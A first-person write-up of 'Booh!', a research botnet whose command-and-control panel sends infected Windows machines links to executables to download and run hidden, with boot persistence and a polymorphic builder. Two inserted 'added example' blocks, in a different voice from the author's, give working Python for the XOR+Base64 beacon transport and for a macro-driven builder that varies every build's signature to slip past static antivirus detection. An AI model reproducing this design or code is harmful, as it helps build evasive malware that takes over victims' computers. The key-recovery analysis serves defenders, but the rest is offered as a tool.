
Welcome to Booh! Botnet

Booh! is a light loader (botnet).
This project is a research project and should not be used for illegal purposes.

I'm Droid

Booh!

"Droid" is a pseudonym of Filipe Borges, created for the purpose of doing research in the area of digital security. With Booh!, I developed a simple HTTP botnet divided into three components:

Panel

The command and control panel manages and issues commands to the network of infected computers (zombies).

Client

A Windows executable (.exe) that, when run, infects the computer and makes it a member of the network.

Polymorphic builder

Generates a new variant of the Client, so that each generated Client has a different file signature from every other one.

Botnet?!

Why?

The idea for this project came from reading a paper by Saurabh Borwankar on polymorphic and metamorphic viruses, in which the concepts of polymorphic and metamorphic code are introduced and illustrated with examples in the JavaScript programming language.

Put simply, polymorphic code is code that uses a polymorphic engine to mutate its appearance while keeping the original algorithm intact, and metamorphic code is code that, when run, outputs a logically equivalent version of its own code under some interpretation.

I found this idea interesting and looked for a project that would let me put it into practice while also involving the C++ programming language, in order to improve my skills. I concluded that developing a loader (botnet) for the Windows operating system might be what I needed.

Defining Steps

The plan

Developing the panel first was a good way to start the project: I already had good skills in developing web apps, which made it a quick way to get going. So the panel would be developed first.

Second, the main .exe (client) code would be developed in C++.

Last would come the polymorphic engine, using the code built in the second stage as its reference. I decided to develop this engine in Python.

First things First

Command & Controller

I started by developing a login system with two levels of access, admin and sub-admin. The admin can see the whole zombie network; a sub-admin sees only the zombies that registered with that sub-admin's credentials.

With that done, I defined all the pages needed for a functional botnet panel and settled on five. I started with the front end (HTML, CSS, JS) and then the back end (PHP), using Laravel as the framework:

Dashboard - an overview where all the information is summarised;
Bots - a data table with the information on every zombie visible to the logged-in account;
Commands - the page where commands are viewed and sent, each carrying a link to an .exe file for the zombies to fetch and run;
Connections - a real-time view of zombie connections to the panel;
Accounts - an admin-only page for managing the sub-admin accounts;

Done! Then I needed a simple API to allow communication between the client (C++) and the panel server (PHP), completing the panel side of the botnet. I did it in a very simple way using HTTP GET requests and, to protect the data in transit, I developed an encryption/decryption scheme based on the XOR algorithm with an 8-digit key generated by the panel for each user, combined with Base64. (I know that XOR is not the best algorithm, but for this purpose it is more than enough.) Note that XOR with a short repeating key is obfuscation rather than encryption: anyone who captures one request and knows or guesses eight bytes of its plaintext recovers the key for that user.
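As an added example (not the project's own PHP or C++ code), the following Python implements the XOR-plus-Base64 transport described above for a single GET parameter, together with the known-plaintext check a reviewer would run against it. The 8-digit per-user key is the page's own design; the field layout (`k=v&...` packed into a parameter named `d`), the API URL, the sample key and the beacon values are assumptions made for this example.

```python
"""XOR-with-repeating-key + Base64 beacon transport, and the known-plaintext
attack against it. Added illustration; the field layout, parameter name 'd',
sample key and sample beacon are constructed for this example."""
import base64
import itertools
from urllib.parse import parse_qs, urlencode, urlparse

KEY_LEN = 8  # the panel issues an 8-digit key per user (from the page)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def encode_message(plaintext: str, key: str) -> str:
    """Client side: XOR with the per-user key, then Base64 so the bytes survive a query string."""
    return base64.b64encode(xor_bytes(plaintext.encode(), key.encode())).decode()


def decode_message(token: str, key: str) -> str:
    """Panel side: Base64-decode, then XOR with the same key."""
    return xor_bytes(base64.b64decode(token), key.encode()).decode()


def build_beacon_url(api: str, key: str, **fields) -> str:
    """Constructed beacon format (assumption): fields joined as k=v&k=v, sent as one GET parameter 'd'.
    urlencode percent-encodes the '+', '/' and '=' that standard Base64 can produce."""
    body = "&".join(f"{k}={v}" for k, v in fields.items())
    return api + "?" + urlencode({"d": encode_message(body, key)})


def read_beacon(url: str, key: str) -> dict:
    """Panel side: pull the 'd' parameter out of the request URL and unpack the fields."""
    token = parse_qs(urlparse(url).query)["d"][0]
    return dict(kv.split("=", 1) for kv in decode_message(token, key).split("&"))


def recover_key(token: str, known_plaintext: str) -> str:
    """Known-plaintext attack: with KEY_LEN bytes of plaintext known or guessed (for
    instance a fixed leading field name), XOR against the first KEY_LEN ciphertext
    bytes yields the entire repeating key. A wrong guess simply yields garbage."""
    ciphertext = base64.b64decode(token)
    known = known_plaintext.encode()
    if len(known) < KEY_LEN or len(ciphertext) < KEY_LEN:
        raise ValueError("need at least KEY_LEN bytes of known plaintext and ciphertext")
    return xor_bytes(ciphertext[:KEY_LEN], known[:KEY_LEN]).decode(errors="replace")


if __name__ == "__main__":
    key = "48213907"  # constructed sample key
    url = build_beacon_url("http://panel.example/api", key, hostname="WIN-7X", user="alice", ver="1")
    print(url)
    print(read_beacon(url, key))
    # An observer who only guesses that every beacon starts with "hostname=" gets the key back.
    token = parse_qs(urlparse(url).query)["d"][0]
    print(recover_key(token, "hostname="))
```

Because the key repeats every eight bytes, any eight bytes of predictable plaintext (a fixed field name, a known hostname) reveal the whole key, after which every beacon from that user decodes. Even without known plaintext, an 8-digit key has only 10^8 values, small enough to try exhaustively offline against one captured request and keep the key that yields printable output.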



C++

Client

Now it was time to develop the main C++ client code. I started by researching the functionality the node needed and settled on:

HTTP GET request - the client-side connection to the server-side API.
Encryption/decryption - the counterpart of the server-side scheme, so that the information exchanged between client and server is encoded.
Download function - lets the node download a file from a URL supplied by the C&C administrator.
Hidden execution - lets the node run the downloaded file without showing a window.
Startup function - registers the node so that it starts automatically at every boot of the infected system.

With that settled, it was time to write the code and conclude the second stage.


C++ Generator

Polymorphic Builder

For the last stage I needed to develop a Python engine that took the C++ code created in the second stage as its reference and rewrote it in mutated form without loss of functionality.

Essentially, I organised the pre-developed C++ source into an array and replaced the parts I wanted to randomise with predefined macros. This made it possible to write a class that interprets the macros in the code, replaces them with newly generated elements (variable names, dead functions, ...) and saves the result into the corresponding C++ Visual Studio project file.
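The mechanism described above, as an added example rather than the Booh! builder itself: a C++ template whose randomisable parts are macros, a Python function that expands them with freshly generated identifiers, dead functions and junk statements, and a sanity check for unexpanded macros. The macro syntax (`@ID:name@`, `@DEAD@`, `@JUNK@`), the harmless template program and the seed-based determinism are assumptions made for this example.

```python
"""Macro-driven polymorphic source builder, in the spirit of the engine described
above. Added illustration, not the project's own code: the macro syntax, the
template program and the seeding are assumptions made for this example.

  @ID:name@  -> a freshly generated identifier, consistent within one build
  @DEAD@     -> a never-called function with random constants (dead code)
  @JUNK@     -> a harmless statement inside a function body
"""
import hashlib
import random
import re
import string

ID_MACRO = re.compile(r"@ID:([A-Za-z_]\w*)@")
DEAD_MACRO = re.compile(r"@DEAD@")
JUNK_MACRO = re.compile(r"@JUNK@")

# Constructed template: everything the builder may randomise is a macro,
# everything else is copied verbatim. The program itself just prints a string.
TEMPLATE = r"""#include <cstdio>

@DEAD@
@DEAD@

static const char* @ID:greeting@ = "booh";

int @ID:show@(const char* @ID:msg@) {
    @JUNK@
    return std::printf("%s\n", @ID:msg@);
}

@DEAD@

int main() {
    @JUNK@
    return @ID:show@(@ID:greeting@) > 0 ? 0 : 1;
}
"""

ALPHA = string.ascii_letters + "_"
ALNUM = ALPHA + string.digits


def _fresh_identifier(rng, used, length=10):
    """Random C++ identifier not yet used in this build."""
    while True:
        name = rng.choice(ALPHA) + "".join(rng.choice(ALNUM) for _ in range(length - 1))
        if name not in used:
            used.add(name)
            return name


def _dead_function(rng, used):
    """A static function nothing references: pure dead code with random constants."""
    name = _fresh_identifier(rng, used)
    a, b = rng.randint(1, 999), rng.randint(1, 999)
    op = rng.choice(["+", "^", "|", "&"])
    return f"static int {name}(int x) {{ return (x {op} {a}) % {b}; }}"


def _junk_statement(rng, used):
    """A no-op the compiler must keep (volatile) but that changes the emitted bytes."""
    name = _fresh_identifier(rng, used)
    return f"volatile int {name} = {rng.randint(0, 9999)}; (void){name};"


def build_variant(template, seed):
    """Expand every macro; returns (source, identifier_map). Same seed, same output."""
    rng = random.Random(seed)
    used = set()
    id_map = {}

    def sub_id(match):
        original = match.group(1)
        if original not in id_map:  # one new name per original name, reused on every occurrence
            id_map[original] = _fresh_identifier(rng, used)
        return id_map[original]

    out = ID_MACRO.sub(sub_id, template)
    out = DEAD_MACRO.sub(lambda m: _dead_function(rng, used), out)
    out = JUNK_MACRO.sub(lambda m: _junk_statement(rng, used), out)
    return out, id_map


def remaining_macros(source):
    """Builder sanity check: any macro left unexpanded would break the C++ compile."""
    return re.findall(r"@[A-Z]+(?::\w+)?@", source)


def fingerprint(source):
    """Hash of the generated source; differs for every seed."""
    return hashlib.sha256(source.encode()).hexdigest()


if __name__ == "__main__":
    for seed in (1, 2):
        src, ids = build_variant(TEMPLATE, seed)
        assert not remaining_macros(src)
        print(f"seed {seed}: sha256={fingerprint(src)[:16]}... ids={ids}")
```

Each build yields a source file with different identifiers, different dead functions and therefore a different hash, while the program's behaviour is unchanged; the identifier map is returned so a build can be logged. Two caveats worth keeping in mind: a function that nothing references may be discarded by the optimiser or linker, so dead code that is meant to survive into the binary needs something to reference it; and since the imports, strings and behaviour do not change, this defeats only static signatures over the renamed bytes, not import-based or behavioural detection.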



The moment of truth!

Time To Test!

Final thoughts!

Conclusion!

Developing this project was unbelievably fun and intellectually rewarding! With it I had the opportunity to understand a little more about digital security, more specifically about botnets: how they work, how they are built and, most importantly, how to better prevent them. Not to forget the enrichment of my skills in PHP, JavaScript, HTML, CSS and especially C++ and Python, languages in which I still have relatively little experience.

So, to conclude, all the code mentioned in this presentation will be openly available on GitHub; use it responsibly. Thank you for your time!
DROID!